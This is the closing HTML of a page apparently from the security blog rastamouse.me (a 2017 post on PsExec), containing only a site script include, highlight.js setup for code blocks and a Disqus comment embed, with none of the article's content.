<script src="https://rastamouse.me/js/script-wl33z0n6ocaypepiqrazthtivfrliqijej4rq8ek8gvrv1awftmgjuv8k4zc.min.js"></script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight').each(function(i, block) {
    var code = "";
    hljs.highlightAuto(block.innerText).value.split(/\r\n|\r|\n/).forEach(function(line) {
      code += "<span class=\"line\">" + line + "</span><br>";
    });
    if (code.length > 0) {
      block.innerHTML = code;  
    }
  });
  $('pre > code').each(function(i, block) {
    $(this).addClass('codeblock');
    hljs.highlightBlock(block);
  });
});
</script>

  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/rastamouse.me\/2017\/06\/psexec-much\/';
          
            this.page.identifier = '\/2017\/06\/psexec-much\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
          var d = document, s = d.createElement('script');
          var disqus_shortname = 'rastamouse';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  





    
  </body>
</html>

